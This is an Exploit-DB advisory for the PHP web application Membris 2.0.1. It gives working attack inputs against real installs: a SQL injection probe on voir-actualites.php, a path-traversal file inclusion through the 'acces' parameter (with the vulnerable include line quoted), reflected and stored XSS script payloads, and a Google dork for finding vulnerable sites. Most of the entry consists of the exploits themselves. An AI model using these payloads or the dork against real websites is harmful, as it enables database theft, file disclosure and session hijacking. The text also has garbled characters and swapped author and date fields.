Membris 2.0.1 - Multiple Vulnerabilities

Author: Dr.abolalh
type: webapps
platform: php
port: 
date_added: 2012-06-02 
date_updated: 2012-06-02 
verified: 1 
codes: OSVDB-82533;OSVDB-82532;OSVDB-82531;OSVDB-82530 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt19000/screen-shot-2012-06-01-at-104503-pm.png 
application_url: http://www.exploit-db.commembris_5258.zip

###################################
# Exploit:Membris v 2.0.1 Sql \ XSS & File Disclosure Vulnerabilities
# Google Dork: Powered by Membris v 2.0.1
# Date: Dr.abolalh
# Author:01/06/2012
# E-Mail: xa3@hotmail.com
# Software Link: http://scripts.toocharger.com/fiches/scripts/membris/5258.htm
# Version: Membris v 2.0.1
###################################

# Exploit-DB Note:
# Application also suffers from
# stored XSS in the messaging system.
# Insert <script>alert('xss');</script>
# in the message body.



SQL:
voir-actualites.php

Exploit:
voir-actualites.php?idn=1 '

+-----------------------------------------------------------+

File Inclusion


include ("../plugins/" . $_GET['acces'] . "/fonctions.php");

Exploit:
admin/actions-plugin.php�acces=../index.php

+-----------------------------------------------------------+

XSS
search.php

Exploit:
search.php?req= XSS

search.php?req='--></style></script><script>alert(0x0002BC)</script>
+-----------------------------------------------------------+

#+--------------------------------------------------+#
#[�] Greetz to : sec4ever                                #
#---------------------------------------------------+#